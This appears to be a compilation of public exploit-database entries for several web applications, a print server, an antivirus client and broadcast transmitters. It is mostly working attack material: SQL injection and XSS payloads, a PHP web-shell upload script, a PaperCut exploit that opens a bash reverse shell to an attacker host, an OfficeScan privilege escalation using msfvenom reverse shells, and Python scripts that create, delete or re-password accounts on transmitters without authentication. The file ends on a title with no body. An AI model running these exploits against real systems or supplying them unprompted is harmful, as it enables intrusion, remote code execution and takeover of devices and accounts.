WBiz Desk 1.2 - SQL Injection
[#] Exploit Title: WBiz Desk 1.2 - SQL Injection [#] Exploit Date: May 12, 2023. [#] CVSS 3.1: 6.4 (Medium) [#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N [#] Tactic: Initial Access (TA0001) [#] Technique: Exploit Public-Facing Application (T1190) [#] Application Name: WBiz Desk [#] Application Version: 1.2 [#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system [#] Author: h4ck3r - Faisal Albuloushi [#] Contact: [email protected] [#] Blog: https://www.0wl.tech [#] 3xploit: [path]//ticket.php?tk=[SQL Injection] [#] 3xample: [path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- - [#] Notes: - The vulnerability requires a non-admin privilege (normal) user to be exploited.
thrsrossi Millhouse-Project 1.414 - Remote Code Execution
<?php /* Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution Date: 12/05/2023 Exploit Author: Chokri Hammedi Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project Software Link: https://github.com/thrsrossi/Millhouse-Project.git Version: 1.414 Tested on: Debian CVE: N/A */ $options = getopt('u:c:'); if(!isset($options['u'], $options['c'])) die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n \033[0m\n \n"); $target = $options['u']; $command = $options['c']; $url = $target . '/includes/add_post_sql.php'; $post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="title" helloworld ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="description" <p>sdsdsds</p> ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="category" 1 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="image"; filename="rose.php" Content-Type: application/x-php <?php $shell = shell_exec("' . $command . '"); echo $shell; ?> ------WebKitFormBoundaryzlHN0BEvvaJsDgh8-- '; $headers = array( 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8', 'Cookie: PHPSESSID=rose1337', ); $ch = curl_init($url); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); $response = curl_exec($ch); curl_close($ch); // execute command $shell = "{$target}/images/rose.php?cmd=" . 
urlencode($command); $ch = curl_init($shell); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $exec_shell = curl_exec($ch); curl_close($ch); echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n"; ?>
PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) # Date: 13 May 2023 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader # Vendor Homepage: https://www.papercut.com/ # Version: 8.0 or later # Tested on: 22.0.4 # CVE: CVE-2023-27350 import requests import argparse Group_payload = { "service":"direct/1/OptionsUserSync/$OptionsUserSource.$Form", "sp":"S0", "Form0":"$Hidden,$Hidden$0,$Hidden$1,$PropertySelection,$Hidden$2,$Hidden$3,$Hidden$4,$Hidden$5,$Hidden$6,$Hidden$7,$Hidden$8,$Hidden$9,$Hidden$10,$Hidden$11,$Hidden$12,$Hidden$13,$Hidden$14,$TextField,$TextField$0,$RadioGroup,$Submit,$Checkbox$2,primaryCardIdLength,$Checkbox$3,secondaryCardIdLength,$Checkbox$5,$Hidden$15,$Hidden$16,$Hidden$17,$Hidden$18,$Hidden$19,$Hidden$20,$Hidden$21,$PropertySelection$4,$TextField$13,$Checkbox$6,$TextField$14,$TextField$15,$TextField$16,$RadioGroup$0,$Submit$1,$PropertySelection$5,$TextField$17,$PropertySelection$6,$TextField$18,primaryCardId2Length,$PropertySelection$7,$TextField$19,secondaryCardId2Length,$Checkbox$7,$TextField$20,$Checkbox$8,$Checkbox$9,$Checkbox$10,$Submit$2,$Submit$3,$Submit$4,$Submit$5", "$Hidden":"Sf278fd737ffcaed6eb3d1f67c2ba5c6d", "$Hidden$0":"F", "$Hidden$1":"F", "$Hidden$2":"OH4sIAAAAAAAAAJWQwUrDQBCGp60VBBUp4lWRnncRPIjSg4iHwrYNpBU8xXW7JitJdp1sis2hF5_BlxBP-lw-gF50Y2Mp6MW5DTP_fP8_z2_QzBDotSqI4UaiyC0xIg1JJnGihCQDY5VOs5HrfZ2jkMOpkVeHny8bD8VeHVa6sBYYVBqVnTLYCnhuIw91iDzxuI0stNgtn3Aa8zSkvkWVhies1MTc3mhMLBwzR6c_dFrSaUWnf9LbXqV1h3aCfDFbwt7BDGr3CO3fwXKrYsK04LEq5Pg8zZPex26j87i-XQdwkn2NIeGGi0gSoZPE4Ulpnki3mpFS8N556r4eXBR1qDFoqj5P5BxoLKyejfzhoAcAYzNDOPrnZxfZoKrWt6nN8odzG6WB5aFjNk77l-YLeZfbs8sBAAA.", "$Hidden$3":"F", "$Hidden$4":"X", "$Hidden$5":"X", "$Hidden$6":"X", "$Hidden$7":"X", "$Hidden$8":"X", "$Hidden$9":"X", "$Hidden$10":"X", "$Hidden$11":"X", "$Hidden$12":"X", "$Hidden$13":"F", "$Hidden$14":"X", "$Hidden$15":"F", "$Hidden$16":"S", "$Hidden$17":"S", "$Hidden$18":"S", "$Hidden$19":"S", "$Hidden$20":"F", 
"$Hidden$21":"SSTANDARD_UNIX", "$PropertySelection":"3,CUSTOM", "$TextField":"/usr/bin/python3", "$TextField$0":"/usr/bin/python3", "$RadioGroup":"0", "primaryCardIdLength":"8", "secondaryCardIdLength":"8", "$PropertySelection$4":"0,STANDARD_UNIX", "$TextField$13":"", "$TextField$14":"", "$TextField$15":"", "$TextField$16":"", "$RadioGroup$0":"0", "$PropertySelection$5":"NONE", "$TextField$17":"", "$PropertySelection$6":"NONE", "$TextField$18":"employeeNumber", "primaryCardId2Length":"8", "$PropertySelection$7":"NONE", "$TextField$19":"", "secondaryCardId2Length":"8", "$TextField$20":"", "$Submit$4":"Apply" } parser = argparse.ArgumentParser(description="Papercut RCE") parser.add_argument('--url',help='Url of the vunerable application example http://10.2.3.4:9191 dont need the trailing /') parser.add_argument('--ip',help='our rev shell ip') parser.add_argument('--port',help='our rev shell port') args = parser.parse_args() url = args.url ip = args.ip port = args.port passwd_input = f"import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\")" final_payload = { "service":"direct/1/Home/$Form$0", "sp":"S0", "Form0":"$Hidden$0,$Hidden$1,inputUsername,inputPassword,$PropertySelection$0,$Submit$0", "$Hidden$0":"true", "$Hidden$1":"X", "inputUsername":"help", "inputPassword":passwd_input, "$PropertySelection$0":"en", "$Submit$0":"Log+in" } # create a session session = requests.Session() # visit the first URL to set up the session setup_url = url+"/app?service=page/SetupCompleted" response = session.get(setup_url) response.raise_for_status() # check for any errors # visit the second URL using the same session dashboard_url = url+"/app?service=page/Dashboard" response = session.get(dashboard_url) response.raise_for_status() # check for any errors # URL to change user group user_group_change_url = url+"/app" response = session.post(user_group_change_url,data=Group_payload) response.raise_for_status() # check for errors # URL to gain RCE rce_url = url+"/app" 
response = session.post(rce_url,data=final_payload) response.raise_for_status() # Check for any errors # print the response text print(response.text)
Trend Micro OfficeScan Client 10.0 - ACL Service LPE
# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE # Date: 2023/05/04 # Exploit Author: msd0pe # Vendor Homepage: https://www.trendmicro.com # My Github: https://github.com/msd0pe-1 Trend Micro OfficeScan Client: Versions =< 10.0 carry overly permissive ACLs on the OfficeScan Client folder (BUILTIN\Users holds Full control, as the icacls output below shows), which allows a local user to replace the service binaries and escalate privileges to SYSTEM through the services. Exploiting this vulnerability does not require any privileged access. [1] Verify the folder permissions: > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client" C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F) NT SERVICE\TrustedInstaller:(CI)(IO)(F) NT AUTHORITY\SYSTEM:(F) NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F) BUILTIN\Administrators:(F) BUILTIN\Administrators:(OI)(CI)(IO)(F) BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) CREATOR OWNER:(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO) [2] Get information about the services (both run as LocalSystem from the writable folder): > sc qc tmlisten [SC] QueryServiceConfig SUCCESS SERVICE_NAME: tmlisten TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OfficeScan NT Listener DEPENDENCIES : Netman : WinMgmt SERVICE_START_NAME : LocalSystem OR > sc qc ntrtscan SERVICE_NAME: ntrtscan TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OfficeScan NT RealTime Scan DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe OR > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe [4] Upload the reverse shell to 
C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop tmlisten > sc start tmlisten OR > sc stop ntrtscan > sc start ntrtscan OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) #Application: PodcastGenerator #Version: v3.2.9 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://podcastgenerator.net/ #Software Link: https://github.com/PodcastGenerator/PodcastGenerator #Date of found: 14-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: #########XSS -1############## 1.go to 'Episodes' then 'Upload New Episodes'(http://localhost/PodcastGenerator/admin/episodes_upload.php) 2.set title section as <img src=1 onerror=alert("XSS-1")> 3.And go to 'View All Episoded'(http://localhost/PodcastGenerator/admin/episodes_list.php) payload: <img src=1 onerror=alert("XSS-1")> poc- request: POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: localhost Content-Length: 8307 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn Connection: close ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg" Content-Type: image/jpeg image content asdfasdfasdfasdfasdfasdfasdfa ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="title" <img src=1 
onerror=alert("XSS-1")> ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="shortdesc" fffff ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="date" 2023-05-14 ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="time" 11:05 ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="episodecover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="longdesc" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="episodenum" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="seasonnum" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="itunesKeywords" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="explicit" yes ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="authorname" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="authoremail" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="customtags" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="token" 6GnmEMNnhFfyNeTRciGsh8p4R4djazh8 ------WebKitFormBoundary3NXAbhxohxCgUFNi-- #########XSS -2############## 1.go to "Themes and aspect" then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php) 2. 
set Freebox content as <script>alert("XSS-2")</script> 3.go to home page (http://localhost/PodcastGenerator/) payload: <script>alert("XSS-2")</script> poc Request: POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1 Host: localhost Content-Length: 96 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn Connection: close content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8 #########XSS -3############## 1. go to "Podcast Details" then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php) 2. 
set "Podcast tile " as <svg/onload=prompt("XSS-3")> 3.go to home page (http://localhost/PodcastGenerator/) payload: <svg/onload=prompt("XSS-3")> poc-request: POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1 Host: localhost Content-Length: 300 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/podcast_details.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn Connection: close podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd©right=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC
Screen SFT DAB 600/C - Authentication Bypass Account Creation
#!/usr/bin/env python3 # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. 
# # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5771 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') u=input('Enter desired username: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::newUser') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber++', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'newUser':{ 'password':h, 'type':'OPERATOR', 'username':u } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-5)
Screen SFT DAB 600/C - Authentication Bypass Password Change
#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. 
# # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5772 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') u=input('Enter desired username: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::changeUserPswd') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber+', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'changeUserPswd':{ 'username':u, 'password':h } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-4)
Screen SFT DAB 600/C - Authentication Bypass Erase Account
#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. 
# # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5773 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') u=input('Enter desired username: ') e='/system/api/userManager.cgx' print('Calling object: ssbtObj') print('CGX fastcall: userManager::removeUser') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber-', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'removeUser':u } } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-3)
Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: This exploit circumvents the control and requirement of admin's # old password and directly changes the password. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5774 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. 
''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::changeUserPswd') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber-+', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'changeUserPswd':{ 'username':'admin', 'password':h } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-2)
Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
